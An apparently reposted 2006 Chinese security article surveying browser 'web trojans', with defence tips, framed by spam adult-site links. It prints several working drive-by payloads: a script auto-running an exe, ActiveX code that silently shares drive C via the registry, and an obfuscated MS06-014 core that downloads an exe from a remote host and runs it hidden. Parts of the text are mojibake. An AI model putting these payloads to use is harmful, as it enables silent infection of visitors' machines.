日本一区午夜爱爱,毛片免费在线播放,999人在线精品播放视频

網(wǎng)頁(yè)木馬綜述

文章作者：金州
信息來(lái)源：邪惡八進(jìn)制信息安全團(tuán)隊(duì)（www.eviloctal.com）

網(wǎng)頁(yè)木馬綜述

前言，又8月份了。又該寫東西，一直寫不出好的東西。大約還是天分不足，努力不夠。雖然才疏學(xué)淺，還是堅(jiān)持盡量一個(gè)月弄出點(diǎn)什么，算是學(xué)習(xí)筆記了。看看上次寫出來(lái)東西是6月多，一個(gè)多月了。不過(guò)寫出來(lái)更失望。仿佛什么都沒(méi)有學(xué)會(huì)，常?？粗约簩懙美鴸|西不知所措。而時(shí)間流走了，運(yùn)命唯所遇。東西比想象中的難學(xué)，生活比想象中的艱辛。希望自己有一天能真的寫出對(duì)自己對(duì)別人有幫助的東西。祝福父母弟弟愛(ài)人所有的朋友，所有善良的人。

金州（EST.VIP）2006.8.4

一，總論
二，網(wǎng)頁(yè)木馬的基本工作流程。
三，網(wǎng)頁(yè)木馬的基本防范。
四，參考文獻(xiàn)

一，總論
網(wǎng)頁(yè)木馬一直是國(guó)內(nèi)網(wǎng)絡(luò)流行的東西。（金州注釋，據(jù)朋友說(shuō)，這種東西在國(guó)外并不流行。）之所以比較流行金州覺(jué)得有如下原因，
1.網(wǎng)頁(yè)木馬在各種網(wǎng)絡(luò)威脅中技術(shù)含量相對(duì)來(lái)說(shuō)屬于較低的類型。這就意味著他便于制作推廣。
2.免費(fèi)空間的增多和個(gè)人建站的流行，給網(wǎng)頁(yè)木馬客觀附帶的造就了很大的生存空間。
3.國(guó)內(nèi)上網(wǎng)人數(shù)的奇跡般的遞增，使網(wǎng)頁(yè)木馬的受眾層增多。
4.國(guó)內(nèi)上網(wǎng)人群目前普遍安全意識(shí)較低，很多人使用盜版系統(tǒng)，有時(shí)候無(wú)法更新補(bǔ)丁或及時(shí)更新補(bǔ)丁，（金州注釋，國(guó)內(nèi)網(wǎng)頁(yè)木馬大多是針對(duì)windows系統(tǒng)的ie的）使針對(duì)ie漏洞型的網(wǎng)頁(yè)木馬生存時(shí)間延長(zhǎng)。
5.網(wǎng)頁(yè)木馬見效快，（金州注釋，這個(gè)并不是證明網(wǎng)頁(yè)木馬效率高，而是因?yàn)槭鼙姸啵?br>6.很多間接推動(dòng)網(wǎng)絡(luò)安全，擅長(zhǎng)腳本技術(shù)的人很及時(shí)地推出了眾多簡(jiǎn)便式的網(wǎng)頁(yè)木馬生成器或網(wǎng)頁(yè)木馬程式。此中icefox(冰狐浪子EST)，LCX(haiyangtop.126.com)等對(duì)于國(guó)內(nèi)網(wǎng)頁(yè)木馬的流行起到了奠基的作用。

以上jinzhou只是淺顯說(shuō)到網(wǎng)頁(yè)木馬之所以流行的原因。其中也可看到網(wǎng)頁(yè)木馬目前來(lái)說(shuō)還是具有一定優(yōu)點(diǎn)的，尤其是制作操作簡(jiǎn)單。和相對(duì)收效快的特點(diǎn)。下面簡(jiǎn)單說(shuō)說(shuō)網(wǎng)頁(yè)木馬的一些不足。
1.很多網(wǎng)頁(yè)木馬針對(duì)的是特有的ie漏洞。（金州注釋，關(guān)于詳細(xì)情形，以下論述）一旦漏洞補(bǔ)上，網(wǎng)頁(yè)木馬失效。ie的漏洞相對(duì)系統(tǒng)的核心漏洞來(lái)說(shuō)，修補(bǔ)比較容易。（金州注釋，何況有些人根本就不是用ie和ie內(nèi)核瀏覽器）
2.網(wǎng)頁(yè)木馬的絕對(duì)命中率較低，一般來(lái)說(shuō)10%就很不錯(cuò)了。（金州注釋，這由多種原因造成，比如受眾方做了其他限制，一些殺毒軟件或監(jiān)控軟件的干擾和警示，對(duì)相關(guān)運(yùn)行網(wǎng)頁(yè)木馬的一些控件的解除，比如更名或刪除debug和wsh等會(huì)使一些網(wǎng)頁(yè)木馬無(wú)法成功，一些安全監(jiān)視工具會(huì)提示異常運(yùn)行等等）
3.網(wǎng)頁(yè)木馬沒(méi)有固定目標(biāo)。缺乏針對(duì)性，一定意義上，它只是等著別人來(lái)中，它不能主動(dòng)地選擇受眾。
4.網(wǎng)頁(yè)木馬很難感染一些重要部門的重要機(jī)器而不被發(fā)現(xiàn)。網(wǎng)頁(yè)木馬常常無(wú)力顧及木馬被下載后的深入隱藏。很容易被一些有基礎(chǔ)安全知識(shí)的人查獲。
5.因?yàn)榫W(wǎng)頁(yè)木馬一旦應(yīng)用，即等于間接性的公開了腳本，具有時(shí)效性。幾乎不可能有永遠(yuǎn)好使的網(wǎng)頁(yè)木馬，（金州注釋，指的是網(wǎng)頁(yè)木馬的流程），而一些rootkit甚至能隱藏10年。網(wǎng)頁(yè)木馬類流行很少過(guò)年。

目前網(wǎng)頁(yè)木馬的主要危害，金州覺(jué)得主要是利用網(wǎng)頁(yè)木馬控制大量機(jī)器，間接形成僵尸網(wǎng)絡(luò)進(jìn)行利用tcp/ip協(xié)議漏洞的DOS/DDOS攻擊。和一些其他的商業(yè)非法活動(dòng)，例如投票，發(fā)布商業(yè)廣告，作為跳板的一些滲透等。很多時(shí)候能造成極大的危害。也就是說(shuō)網(wǎng)頁(yè)木馬的利用趨勢(shì)已經(jīng)由開始的惡作劇性的對(duì)某些機(jī)器的窺視變成了利用受眾機(jī)器形成一種力量轉(zhuǎn)做為攻擊和謀求商業(yè)利益的武器。

二，網(wǎng)頁(yè)木馬的基本工作流程。
網(wǎng)頁(yè)木馬的基本工作流程，大致是，
1.受眾打開含有網(wǎng)頁(yè)木馬代碼的網(wǎng)頁(yè)，
2.網(wǎng)頁(yè)木馬利用ie漏洞或者一些腳本功能下載一個(gè)可執(zhí)行文件或腳本。（金州注釋，很多時(shí)候根據(jù)需要附帶同時(shí)紀(jì)錄用戶ip）
如以下代碼

<script language="javascript">
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"jinzhou.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1>金州提示，網(wǎng)頁(yè)加載中，請(qǐng)稍后....正在運(yùn)行木馬</H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>

保存為jinzhou.html然后在同目錄下放一個(gè)exe文件，起名為jinzhou.exe.運(yùn)行jinzhou.html,會(huì)出現(xiàn)金州提示，網(wǎng)頁(yè)加載中，請(qǐng)稍后....正在運(yùn)行木馬，然后那個(gè)jinzhou.exe就會(huì)運(yùn)行。（金州注釋，本地和遠(yuǎn)程都會(huì)提示，一般稍有一點(diǎn)安全意識(shí)的都不會(huì)中，不過(guò)事實(shí)上這種方法現(xiàn)在仍然會(huì)使很多極其不小心的人上當(dāng)。此流程比較經(jīng)典。）

< script language=javascript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");
}
function init()
{
setTimeout("f()", 1000);
}
init();
</script>

調(diào)用本地控件寫注冊(cè)表的代碼。此代碼是共享c，當(dāng)然你可以共享任何盤。

<script language="vbscript">

const adTypeBinary = 1
const adSaveCreateOverwrite = 2
const adModeReadWrite = 3

set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET","http://www.xxx.com/jinzhou.EXE", false
xmlHTTP.send
contents = xmlHTTP.responseBody

Set oStr = CreateObject("ADODB.Stream")
oStr.Mode = adModeReadWrite
oStr.Type = adTypeBinary
oStr.Open

oStr.Write(contents)
oStr.SaveToFile "c:\\jinzhou.exe", adSaveCreateOverwrite

</script>
上面以前的Adodb.Stream文件下載代碼核心部分。

<script language="VBScript">
on error resume next
dl = "http://www.xxx.com/jinzhou.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="g0ld.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>

以上MS06014利用代碼核心。

綜合以上，大致可以看出，網(wǎng)頁(yè)木馬的基礎(chǔ)就是非法讓受眾在不知覺(jué)得情況下改變用戶配置或下載運(yùn)行非法程序以非法謀取自己的非法利益。不在一一舉例。在網(wǎng)頁(yè)木馬的歷史上影響重大的還有MHT漏洞即Windows在處理畸形MHTML，能執(zhí)行任意遠(yuǎn)程腳本代碼。（金州注釋，國(guó)內(nèi)一般稱為chm木馬。冰狐浪子對(duì)此有很詳細(xì)的文章。）木馬有2個(gè)組成部分，一個(gè)是利用MHT漏洞的惡意網(wǎng)頁(yè)代碼，另一個(gè)是包含惡意程序的CHM文件。把它們都放到網(wǎng)站上，用戶訪問(wèn)惡意網(wǎng)頁(yè)時(shí)，會(huì)在沒(méi)有任何安全提示的情況下，自動(dòng)下載遠(yuǎn)程CHM文件中的程序并運(yùn)行。HHCTRL漏洞，HTML幫助ActiveX控件存在問(wèn)題，利用它可以進(jìn)行跨安全區(qū)域腳本執(zhí)行，從而可以下載并自動(dòng)執(zhí)行遠(yuǎn)程惡意程序。HTA漏洞，IE瀏覽器允許HTA類型的代碼以全部權(quán)限運(yùn)行。遠(yuǎn)程HTA代碼可以調(diào)用Wscript.Shell等控件執(zhí)行用戶本地的任意程序，iframe溢出等等。網(wǎng)上相關(guān)資料較多。不再贅述?？傮w來(lái)說(shuō)，網(wǎng)頁(yè)木馬的制作并不復(fù)雜，它的重點(diǎn)往往會(huì)在加密和輔助的隱藏上。

三，網(wǎng)頁(yè)木馬的基本防范
網(wǎng)頁(yè)木馬的基本防范大概如下幾點(diǎn)，（金州注釋，針對(duì)個(gè)人的，網(wǎng)頁(yè)木馬絕大多數(shù)受眾都是個(gè)人。）

1.，卸載或者改名whs腳本宿主。刪除注冊(cè)表｛F935DC22-1CF0-11D0-ADB9-00C04FD58A0B｝
{0D43FE01-F093-11CF-8940-00A0C9054228}，運(yùn)行regsvr32 scrrun.dll /u 卸載控件等。
2.在我的電腦，屬性，高級(jí)，環(huán)境變量中，PATHEXT刪除一些危險(xiǎn)的變量，如vbs,vbe,js等?；蛟谖募A選項(xiàng)，文件類型中更改vbs，Windows Script Host等的關(guān)聯(lián)。
3.禁用ftp，tftp,或改變端口。等防止網(wǎng)頁(yè)木馬的利用途徑。找到C:\windows\system32\drivers\Etc 記事本打開其中的services文件會(huì)看到一些對(duì)應(yīng)的端口，改一下保存就行了。改名debug等。
4.最好安裝殺毒軟件。打開實(shí)時(shí)監(jiān)控，一般網(wǎng)頁(yè)木馬殺毒還是會(huì)報(bào)警的。
5.提高警惕性，一旦發(fā)現(xiàn)ie運(yùn)行不正常，比如卡或者無(wú)故死掉，或者一場(chǎng)閃出，養(yǎng)成立刻檢查系統(tǒng)的習(xí)慣。
6.多注意查看網(wǎng)頁(yè)源代碼，無(wú)論多么高明的網(wǎng)頁(yè)木馬，在源代碼中也可以看出端倪。
7.注意更新系統(tǒng)補(bǔ)丁。
等等。
（金州注釋，以上為個(gè)人見解，技術(shù)日新月異，不一定有效全面，個(gè)人愚笨，在學(xué)習(xí)中，不足之處見諒。另，文中一些代碼可能會(huì)被殺毒報(bào)警，無(wú)害。）

四，參考文獻(xiàn)
邪惡八進(jìn)制信息安全團(tuán)隊(duì)技術(shù)論壇（http://forum.eviloctal.com/）
lcx海陽(yáng)頂端資料（http://haiyang.net/safety/defaultx.asp）

金州 2006.8.4 [est_vip]

描述：pdf文檔
附件：

網(wǎng)頁(yè)木馬綜述.rar (16 K) 下載次數(shù):71

本站僅提供存儲(chǔ)服務(wù)，所有內(nèi)容均由用戶發(fā)布，如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容，請(qǐng)點(diǎn)擊舉報(bào)。

免费视频淫片aa毛片_日韩高清在线亚洲专区vr_日韩大片免费观看视频播放_亚洲欧美国产精品完整版